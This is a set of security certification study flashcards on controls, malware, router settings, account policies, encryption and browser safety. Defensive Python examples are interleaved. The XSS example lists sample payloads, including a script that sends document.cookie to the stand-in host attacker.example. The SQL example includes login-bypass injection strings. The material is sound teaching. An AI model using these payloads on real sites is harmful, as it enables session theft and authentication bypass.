Domain 2: Security Flashcards
Difference between procedural & logical security controls
-Procedural are enforced by people
-Logical are enforced by cyber systems & software
2-step verification
Authentication mechanism that uses a separate channel to authorize a sign-on attempt or to transmit an additional credential, e.g. a code sent by email, text message or voice call.
Risk
Likelihood and impact (or consequence) of a threat actor exercising a vulnerability
Vulnerability scanner
A class of software designed to detect unpatched, misconfigured or otherwise noncompliant systems by probing them for known vulnerabilities
Difference between unprotected system and a noncompliant system
-An unprotected system has at least one security control either missing or improperly configured
-A noncompliant system has drifted from its hardened (baseline) configuration
Exploit
Malicious code that can use a vulnerability to compromise a host
True or false: an evil twin is an on-path attack
True
XSS
Cross-site scripting
Attack in which a malicious script, hosted on the attacker's site or injected via a crafted link or input onto a trusted site, runs in the browsers of clients visiting the trusted site with that site's privileges, circumventing the browser's security model of trusted zones (the same-origin policy).
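The reflected-XSS case from the card above, as an added example (not code from the original flashcards): a search page that echoes the user's term verbatim next to the same page with output encoding, plus the link-injection variant, where encoding alone is not enough and the URL scheme has to be validated. The sample inputs and the attacker.example host are constructed for the demo.

```python
import html
from urllib.parse import urlparse

# Constructed sample inputs (not taken from the page): a benign search term
# and two typical reflected-XSS payloads.
SAMPLE_INPUTS = [
    "laptops",
    '<script>location="http://attacker.example/?c="+document.cookie</script>',
    '"><img src=x onerror=alert(1)>',
]


def render_vulnerable(query: str) -> str:
    """Reflects the user-supplied term into the page verbatim: the XSS bug."""
    return f"<p>Results for: {query}</p>"


def render_safe(query: str) -> str:
    """Encodes the term for an HTML text context, so '<', '>', '&' and quotes
    become entities and the browser treats the payload as text, not markup."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_link_safe(url: str, text: str) -> str:
    """Links injected by an attacker need scheme validation as well as encoding:
    html.escape leaves 'javascript:alert(1)' as a perfectly working href."""
    if urlparse(url).scheme.lower() not in ("http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text)}</a>'


if __name__ == "__main__":
    for q in SAMPLE_INPUTS:
        print("vulnerable:", render_vulnerable(q))
        print("safe:      ", render_safe(q))
    print(render_link_safe("javascript:alert(document.cookie)", "click"))
```

The encoding is context-specific: `html.escape` is right for text between tags and for quoted attribute values, but a value placed inside a script block or a URL needs the encoder for that context.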
SQL Injection
Structured Query Language Injection
Attack that inserts database query fragments into the input data sent to a server-side application (typically through its client-side interface, such as a web form or URL parameter), so that the server executes attacker-supplied SQL
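A worked instance of the card above, added here as an example (not from the original flashcards): a login query built by string concatenation beside the parameterized version, run against a constructed in-memory SQLite table. The user names and hash values are placeholders.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not from the page)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password_hash TEXT, is_admin INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "hash-a", 1), ("bob", "hash-b", 0)])
    return con


def login_vulnerable(con, username: str, password_hash: str) -> list:
    """Input is pasted into the query text, so quotes in the input change the query."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password_hash = '{password_hash}'")
    return sorted(row[0] for row in con.execute(sql))


def login_safe(con, username: str, password_hash: str) -> list:
    """Parameters travel separately from the query text: input is data, never SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return sorted(row[0] for row in con.execute(sql, (username, password_hash)))


if __name__ == "__main__":
    con = make_db()
    payload = "' OR '1'='1' --"          # closes the string, adds a tautology, comments out the rest
    print(login_vulnerable(con, payload, "wrong"))   # every user: authentication bypassed
    print(login_safe(con, payload, "wrong"))         # nobody: no user is literally named that
    print(login_vulnerable(con, "alice' --", "wrong"))  # logs in as alice without her password
```

The vulnerable query with the first payload becomes `... WHERE username = '' OR '1'='1' --' AND password_hash = 'wrong'`; SQLite treats everything after `--` as a comment, so the password check disappears.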
Hash
Function that converts an arbitrary-length input stream into a fixed-length output string (the digest); it is one-way, so the input cannot be recovered from the digest
The main drawback of asymmetric encryption
The plaintext cannot be larger than the key size (for RSA it must be smaller than the modulus); asymmetric encryption is also far slower than symmetric encryption, so it is used only for small pieces of data
For what is asymmetric encryption often used?
To encrypt cryptographic hashes (with the private key, which produces a digital signature) and to encrypt symmetric encryption keys, which are then referred to as session keys
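The three cards above (fixed-length hash, the message-size limit, and what asymmetric encryption is actually used for) as one added example, not from the original flashcards: a toy textbook RSA with no padding, for illustration only, that shows a hash is always 256 bits, that a block equal to or larger than the modulus is refused, that "encrypting the hash" with the private key is a signature, and that a 32-byte session key is what gets wrapped. The prime generation and key sizes are assumptions made for the demo; never use this in place of a real library.

```python
import hashlib
import secrets


def digest_bits(data: bytes) -> int:
    """SHA-256 output is always 256 bits, whatever the input length."""
    return len(hashlib.sha256(data).digest()) * 8


def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits: int) -> int:
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(candidate):
            return candidate


def keygen(bits: int = 512):
    """Toy textbook RSA (no padding, demo key size): illustration only."""
    e = 65537
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        if p != q and (p - 1) % e and (q - 1) % e:
            break
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))
    return (n, e), (n, d)


def encrypt(pub, m: int) -> int:
    n, e = pub
    if not 0 <= m < n:
        raise ValueError("plaintext must be smaller than the modulus (key size)")
    return pow(m, e, n)


def decrypt(priv, c: int) -> int:
    n, d = priv
    return pow(c, d, n)


def rejects_oversized(pub) -> bool:
    """A block equal to n does not fit in one RSA operation."""
    try:
        encrypt(pub, pub[0])
    except ValueError:
        return True
    return False


def sign(priv, data: bytes) -> int:
    """'Encrypting the hash' with the private key: a digital signature."""
    return decrypt(priv, int.from_bytes(hashlib.sha256(data).digest(), "big"))


def verify(pub, data: bytes, sig: int) -> bool:
    return encrypt(pub, sig) == int.from_bytes(hashlib.sha256(data).digest(), "big")


def wrap_session_key(pub, key: bytes) -> int:
    """Key transport: the short symmetric session key is what RSA encrypts."""
    return encrypt(pub, int.from_bytes(key, "big"))


def unwrap_session_key(priv, wrapped: int, length: int = 32) -> bytes:
    return decrypt(priv, wrapped).to_bytes(length, "big")
```

The 256-bit digest and the 256-bit session key both fit under a 512-bit modulus, which is exactly why these two small items are what asymmetric encryption handles; the bulk data is encrypted with the session key.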
Exploit
Specific method by which malware code infects a target host, often via some vulnerability in a software process
Why CCMP makes replay attacks harder than TKIP did
CCMP (AES in CCM mode) provides authenticated encryption: each frame carries a packet number that is bound into the nonce and covered by the integrity check (MIC), so a replayed frame arrives with a stale packet number and a modified frame fails the MIC. TKIP relied on the much weaker Michael MIC.
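A simplified model of the replay protection described above, added as an example and not part of the original flashcards or of any 802.11 implementation: frames carry a strictly increasing packet number that is covered by the authentication tag, and the receiver drops any frame whose tag fails or whose counter is not newer than the last accepted one. HMAC-SHA256 stands in for AES-CCM (the standard library has no CCM), the 64-bit counter replaces 802.11's 48-bit one, and the key is a constructed demo value.

```python
import hashlib
import hmac
import struct

TAG_LEN = 8   # CCMP's MIC is 8 bytes; the HMAC is truncated to match (model only)
PN_LEN = 8    # 802.11 uses a 48-bit packet number; a 64-bit field keeps struct simple


class Sender:
    """Produces frames: [packet number][payload][tag]. The tag covers the PN
    as well as the payload, so a replayer cannot simply bump the counter."""

    def __init__(self, key: bytes):
        self.key = key
        self.pn = 0

    def frame(self, payload: bytes) -> bytes:
        self.pn += 1                      # strictly increasing, never reused
        header = struct.pack(">Q", self.pn)
        tag = hmac.new(self.key, header + payload, hashlib.sha256).digest()[:TAG_LEN]
        return header + payload + tag


class Receiver:
    """Accepts a frame only if the tag verifies AND the packet number is
    higher than the last one accepted: stale or repeated counters are dropped."""

    def __init__(self, key: bytes):
        self.key = key
        self.last_pn = 0

    def accept(self, frame: bytes):
        if len(frame) < PN_LEN + TAG_LEN:
            return None
        header, payload, tag = frame[:PN_LEN], frame[PN_LEN:-TAG_LEN], frame[-TAG_LEN:]
        expected = hmac.new(self.key, header + payload, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):
            return None                   # integrity (MIC) failure: modified or forged
        pn = struct.unpack(">Q", header)[0]
        if pn <= self.last_pn:
            return None                   # replay (or badly out of order): drop
        self.last_pn = pn
        return payload


if __name__ == "__main__":
    key = b"constructed-demo-key-not-a-real-ptk"
    tx, rx = Sender(key), Receiver(key)
    first = tx.frame(b"hello")
    print(rx.accept(first))               # b'hello'
    print(rx.accept(first))               # None: the same frame replayed
```

Without the tag covering the header, an attacker could re-send an old frame with a fresh counter; without the counter, a frame with a valid tag could be re-sent forever. Both checks are needed.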
True or False: enterprise networks support RADIUS, TACACS+, and Kerberos for authentication
False
Kerberos communication is tunneled & not directly supported
Photo I.D. Authentication type
Something you are
Yellow ports on a home router
LAN ports
How to update the firmware on a router
Download the update from the vendor's website, verify it against the checksum or signature the vendor publishes, then in the management app select the firmware upgrade option and browse for the firmware file you downloaded
How a Soho router performs content filtering
It downloads curated reputation databases
Port forwarding
Process in which a router takes requests from the Internet for a particular app and sends them to a designated host on the LAN
Port triggering
Mechanism to configure access through a firewall for applications that require more than one port
UPnP
Setting on a SOHO router that allows an application on the LAN to send instructions to the firewall to open the ports it needs with the correct configuration parameters. Because any program on the LAN can do this without authentication, UPnP is usually disabled on a hardened router.
DMZ or DMZ host on a home router
A host on the LAN to which the router forwards all unsolicited inbound traffic, so it is effectively not protected by the router's firewall
Minimum password length for non-administrative user accounts
12+ characters
Pre-boot authentication
The loading of an authentication application by UEFI firmware in order to contact an authentication server on the network & allow the user to submit the credentials for their account
System user password
A password that is shared by all users & is required before any operating system can boot (very rarely used)
Lunchtime attack
A threat actor is able to access a computer that has been left unlocked
How to lock a Windows computer
From the user (account) icon on the Start menu, from the Ctrl+Alt+Del screen, or with the Windows key+L shortcut
What should happen when the default administrator account is used
Generation of an alert
Where account policies are configured on a standalone workstation
Local Security Policy snap-in (or the Group Policy Editor snap-in)
4 examples of account policies for security
- Restricted login times
- Timeout/screen lock
- Failed attempts lockout
- Concurrent logins
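The failed-attempts lockout policy from the list above, modelled as an added example (not from the original flashcards) with the three settings Windows exposes for it: lockout threshold, the window after which the failure counter resets, and the lockout duration. The numeric values, the user name and the plaintext credential table are assumptions for the demo; time is injected so the windows can be exercised without waiting.

```python
import hmac
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class LockoutPolicy:
    """Mirrors the three Windows account lockout settings (values are assumptions)."""
    threshold: int = 5            # Account lockout threshold (failed attempts)
    reset_after: float = 15 * 60  # Reset account lockout counter after (seconds)
    duration: float = 30 * 60     # Account lockout duration (seconds)


@dataclass
class AccountState:
    failures: int = 0
    last_failure: float = 0.0
    locked_until: float = 0.0


class Authenticator:
    def __init__(self, credentials: Dict[str, str], policy: Optional[LockoutPolicy] = None):
        # Constructed plaintext table for the demo; real systems store password hashes.
        self.credentials = credentials
        self.policy = policy or LockoutPolicy()
        self.state: Dict[str, AccountState] = {}

    def login(self, user: str, password: str, now: float) -> str:
        """Returns "ok", "denied" or "locked". `now` is injected so the
        time-based rules can be exercised without sleeping."""
        st = self.state.setdefault(user, AccountState())
        p = self.policy
        if now < st.locked_until:
            return "locked"               # even a correct password is refused while locked
        if now - st.last_failure > p.reset_after:
            st.failures = 0               # observation window elapsed: counter resets
        stored = self.credentials.get(user)
        if stored is not None and hmac.compare_digest(stored, password):
            st.failures = 0
            return "ok"
        st.failures += 1
        st.last_failure = now
        if st.failures >= p.threshold:
            st.locked_until = now + p.duration
            st.failures = 0
            return "locked"
        return "denied"


if __name__ == "__main__":
    auth = Authenticator({"alice": "correct horse"})
    for t in range(6):
        print(t, auth.login("alice", "wrong", now=float(t)))
```

The reset window is what separates a password-guessing run (five failures in a few seconds) from a user who mistypes once a week; the lockout duration bounds how long a deliberate lockout denial-of-service against a user lasts.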
Execution control
Process of determining what additional software may be installed on a client or server computer beyond its baseline to prevent the use of unauthorized software
2 types of antivirus software updates
- Definition/pattern updates
- Scan engine/component updates (i.e. the program itself)
Difference between 1) port security triggers, 2) application security triggers and 3) address triggers in firewalls
They are based on
1) the port number
2) the process that listens for (or opens) connections
3) the IP address or FQDN of the server or client hosts
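The three trigger types from the card above, combined in a small first-match rule evaluator; this is an added example, not the original flashcards' content or any vendor's firewall code. A rule may set any combination of the triggers, every set trigger must match, and with no matching rule the default is to block. The rule set, process names, documentation IP ranges and the .test host name are all constructed for the demo.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Connection:
    process: str                        # application trigger: the local process involved
    remote_ip: str
    remote_port: int                    # port trigger
    remote_name: Optional[str] = None   # FQDN, if the resolver supplied one


@dataclass
class Rule:
    action: str                         # "allow" or "block"
    port: Optional[int] = None
    process: Optional[str] = None
    address: Optional[str] = None       # IP/CIDR or FQDN

    def matches(self, c: Connection) -> bool:
        """Every trigger set on the rule must match; unset triggers match anything."""
        if self.port is not None and c.remote_port != self.port:
            return False
        if self.process is not None and c.process.lower() != self.process.lower():
            return False
        if self.address is not None:
            try:
                net = ipaddress.ip_network(self.address, strict=False)
            except ValueError:          # not an IP or CIDR: treat it as an FQDN
                return (c.remote_name or "").lower() == self.address.lower()
            if ipaddress.ip_address(c.remote_ip) not in net:
                return False
        return True


def decide(rules: List[Rule], c: Connection, default: str = "block") -> str:
    """First matching rule wins; with no match the default (deny) applies."""
    for rule in rules:
        if rule.matches(c):
            return rule.action
    return default


# Constructed rule set (process names, ranges and host name are placeholders).
RULES = [
    Rule("block", port=445, address="0.0.0.0/0"),             # port trigger: no SMB anywhere
    Rule("allow", process="chrome.exe", port=443),           # application + port trigger
    Rule("allow", address="10.0.0.0/8"),                     # address trigger: internal net
    Rule("allow", address="update.example.test", port=443),  # FQDN address trigger
]

if __name__ == "__main__":
    print(decide(RULES, Connection("chrome.exe", "203.0.113.5", 443)))   # allow
    print(decide(RULES, Connection("explorer.exe", "10.1.2.3", 445)))   # block
```

Rule order matters: the SMB block sits first so that the broad "allow 10.0.0.0/8" rule below it cannot re-open port 445 to internal hosts.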
EFS
Encrypting File System: NTFS feature supporting file & folder encryption, not available in Home editions of Windows
Main advantages of full disk encryption vs. file/folder encryption
It doesn’t depend on the user to remember to encrypt data. It also encrypts more, such as swap files, print queues, & temp files
BitLocker To Go
BitLocker for removable drives
TPM
Trusted Platform Module
Specification for secure hardware-based storage of encryption keys, hashed passwords, & other user- and platform-identification information
7-item security checklist for workstations
- Password best practices
- End-user best practices
- Account management
- Disable or change the password of the default administrator account
- Disable AutoRun/AutoPlay
- Windows Update, Antivirus, & firewall are enabled
- Data-at-rest encryption, i.e. EFS or BitLocker
Method most websites now use instead of plug-ins to serve dynamic & interactive content more safely
HTML version 5
What 1) hamburger & 2) meatball menus look like
1) 3 horizontal lines stacked on top of each other
2) 3 horizontally or vertically aligned dots
What you must do when using enterprise certificates for internal sites & a third-party browser
Ensure that the internal CA root certificate is added to the browser
The main function of web browser privacy controls
Governing sites’ use of tracking tools such as cookies
Cookie
A small text record that a website stores in the browser and that the browser sends back on later requests to that site; used to hold session identifiers and tracking data
What an incognito window does
Opens a private session in which
- cookies
- browsing history
- form-field entries
- passwords
and
- temp/cache files
are discarded when the window is closed rather than being kept on disk. It does not hide the traffic from the network or from the sites visited.
Primary indicator that must be verified before using a web form
Lock icon indicating the site uses a certificate trusted by the browser (the padlock proves only that the connection is encrypted to the named site, not that the site itself is legitimate)
6 file extensions for executable code
.exe
.msi
.dll
.com
.scr
.jar
Virus
Malware concealed within the code of an executable process image stored as a file on disk
Worm
Malware that replicates between processes in system memory rather than infecting files on disk, and spreads over the network without user action
Fileless malware
Code that uses the host’s scripting environment to create malicious processes in memory
RAT
Remote access Trojan
Malware that gives a threat actor remote control of the PC (a backdoor)
RAT (where it’s found & what it does)
Remote access Trojan
A.k.a. backdoor. Often uses command sequences embedded in HTTPS or DNS traffic to establish a connection between the compromised host and a command and control (C2 or C&C) host or network
8 things Spyware can do
- allow tracking cookies
- change default search providers
- open arbitrary pages at startup
- add bookmarks
- monitor local app activity
- take screenshots
- activate recording devices
- redirect DNS
Rootkit
Malware that runs with system-level (kernel or SYSTEM) privileges, which lets it hide itself from the OS and from security tools
2 ways rootkits hide
- Make changes so that Explorer, Task Manager, ps, or top no longer reveal their presence
- Clean system logs
Cryptominer
Hijacks the resources of the host to perform cryptocurrency mining
5 types of malware as defined according to vector
Viruses
Boot sector viruses
Trojans
Worms
Fileless malware
3 common PC malware infection symptoms
- the computer fails to boot or experiences lock ups
- Performance at startup or in general is very slow
- The host cannot access the network and/or Internet access or network performance is slow
What it indicates when antivirus, the firewall or Windows Update stops working, or when software from reputable vendors (including Windows tools) crashes
Malware infection
Malware symptoms that are unlikely to have other causes
File system errors & anomalies
Rogue antivirus
A type of malware that pretends to have found an infection on the victim’s computer
3 most common causes of certificate warnings
- The certificate is self-signed or issued by a CA that is not trusted
- The FQDN requested by the browser is different from the subject name (or Subject Alternative Name) listed in the certificate
- The certificate has expired or is listed as revoked
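The three warning causes from the card above (together with the earlier card on adding an internal CA root to a third-party browser) as an added example, not from the original flashcards: a checker that takes a certificate in the dictionary shape `ssl.SSLSocket.getpeercert()` returns and reports which warnings a browser would raise. The trust store, the certificates, their names, dates and serial numbers are all constructed for the demo.

```python
import ssl

# Constructed trust store: the CA common names the browser would trust.
TRUSTED_CA_CNS = {"Example Internal Root CA"}


def _cn(name_rdns) -> str:
    """Pull commonName out of the getpeercert()-style RDN tuple structure."""
    return dict(pair for rdn in name_rdns for pair in rdn).get("commonName", "")


def _name_matches(pattern: str, host: str) -> bool:
    pattern, host = pattern.lower(), host.lower()
    if pattern.startswith("*."):
        # a wildcard covers exactly one label: *.example.test, not a.b.example.test
        return host.count(".") == pattern.count(".") and host.endswith(pattern[1:])
    return pattern == host


def certificate_warnings(cert: dict, hostname: str, now: float,
                         trusted=TRUSTED_CA_CNS, revoked=frozenset()) -> list:
    """Return the warnings a browser would raise for this certificate."""
    warnings = []
    subject, issuer = _cn(cert["subject"]), _cn(cert["issuer"])
    if issuer not in trusted:
        warnings.append("self-signed" if issuer == subject else "untrusted-ca")
    dns_names = [v for kind, v in cert.get("subjectAltName", ()) if kind == "DNS"]
    if not any(_name_matches(n, hostname) for n in dns_names):
        warnings.append("name-mismatch")
    if now > ssl.cert_time_to_seconds(cert["notAfter"]):
        warnings.append("expired")
    if now < ssl.cert_time_to_seconds(cert["notBefore"]):
        warnings.append("not-yet-valid")
    if cert.get("serialNumber") in revoked:
        warnings.append("revoked")
    return warnings


def make_cert(subject_cn, issuer_cn, sans, not_before, not_after, serial) -> dict:
    """Constructed certificate in the dict shape ssl.SSLSocket.getpeercert() returns."""
    return {
        "subject": ((("commonName", subject_cn),),),
        "issuer": ((("commonName", issuer_cn),),),
        "subjectAltName": tuple(("DNS", s) for s in sans),
        "notBefore": not_before,
        "notAfter": not_after,
        "serialNumber": serial,
    }


# Constructed test certificates (names, dates and serials are placeholders).
NOW = ssl.cert_time_to_seconds("Jun 15 12:00:00 2024 GMT")
GOOD = make_cert("intranet.example.test", "Example Internal Root CA",
                 ["intranet.example.test", "*.intranet.example.test"],
                 "Jan 10 00:00:00 2024 GMT", "Jan 10 00:00:00 2026 GMT", "01")
SELF_SIGNED = make_cert("nas.example.test", "nas.example.test", ["nas.example.test"],
                        "Jan 10 00:00:00 2024 GMT", "Jan 10 00:00:00 2026 GMT", "02")
EXPIRED = make_cert("old.example.test", "Example Internal Root CA", ["old.example.test"],
                    "Jan 10 00:00:00 2022 GMT", "Jan 10 00:00:00 2024 GMT", "03")

if __name__ == "__main__":
    print(certificate_warnings(GOOD, "intranet.example.test", NOW))     # []
    print(certificate_warnings(SELF_SIGNED, "nas.example.test", NOW))   # ['self-signed']
    print(certificate_warnings(EXPIRED, "old.example.test", NOW))       # ['expired']
```

Passing the internal CA's name in `trusted` is the programmatic equivalent of importing its root certificate into the browser: the same certificate goes from "untrusted-ca" to clean without being changed.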
2 types of malware which might cause browser redirection
Adware & spyware
On-access scanning
When A-V software intercepts an OS call to open a file & scans the file before allowing or preventing its opening
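On-access scanning from the card above, and the split between definition updates and engine updates from the earlier antivirus card, as one added example that is not from the original flashcards or any AV product: a scan engine (the matching logic) runs over a definitions set (hashes and byte patterns), and an open hook refuses to hand back a file handle when the scan hits. The definitions use the standard EICAR test string; the file names and contents are constructed for the demo.

```python
import hashlib
import os
import tempfile

# The EICAR test string: a harmless file that AV engines are expected to detect.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Constructed "definitions": this is the data a definition/pattern update replaces.
# The matching functions below are the "scan engine", updated separately.
DEFINITIONS = {
    "hashes": {hashlib.sha256(EICAR).hexdigest(): "EICAR-Test-File"},
    "patterns": {b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE": "EICAR-Test-File (pattern)"},
}


def scan_bytes(data: bytes, defs=DEFINITIONS):
    """Exact-hash match first (cheap, precise), then byte-pattern match
    (catches the same payload embedded in a larger or slightly altered file)."""
    digest = hashlib.sha256(data).hexdigest()
    if digest in defs["hashes"]:
        return defs["hashes"][digest]
    for pattern, name in defs["patterns"].items():
        if pattern in data:
            return name
    return None


class ThreatDetected(PermissionError):
    def __init__(self, path: str, threat: str):
        super().__init__(f"{path}: {threat}")
        self.threat = threat


def open_scanned(path: str, mode: str = "rb", defs=DEFINITIONS):
    """On-access hook: scan the file before handing a handle to the caller."""
    with open(path, "rb") as fh:
        verdict = scan_bytes(fh.read(), defs)
    if verdict:
        raise ThreatDetected(path, verdict)
    return open(path, mode)


def demo() -> dict:
    """Write three constructed files and record what on-access scanning does."""
    results = {}
    samples = {
        "readme.txt": b"nothing to see here",
        "eicar.com": EICAR,
        "bundle.bin": b"header" + EICAR + b"trailer",   # hash differs, pattern still hits
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(data)
            try:
                with open_scanned(path) as fh:
                    results[name] = f"opened {len(fh.read())} bytes"
            except ThreatDetected as exc:
                results[name] = f"blocked: {exc.threat}"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

A real on-access scanner hooks the OS file-open path (a filter driver on Windows) rather than wrapping `open()`, but the decision point is the same: the verdict is reached before the caller gets the handle.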
How “no-root” firewalls work
By creating a local VPN on the device and routing app traffic through it, so the firewall app can allow or block each app's network access without root privileges
COBO
Corporate owned, business only
The device is the property of the company & may only be used for company business
COPE
Corporate owned, personally enabled
The device is chosen and owned by the company and remains its property. The employee may use it for personal things, subject to the AUP.
CYOD
Choose your own device
The device is chosen by the employee and owned by the company and remains its property. The employee may use it for personal things, subject to the AUP.
Enterprise wipe
Remote-initiated wipe of a mobile device that removes corporate apps and data only
4 ways to destroy a disk
- Shredding with a mechanical shredder
- Incinerating in a furnace designed for media sanitization
- Degaussing with a powerful magnet (effective on magnetic hard disks and tape only; it does nothing to flash-based SSDs)
- Drill/hammer [less secure]
User permission level for modifying system files or installing a service
Administrator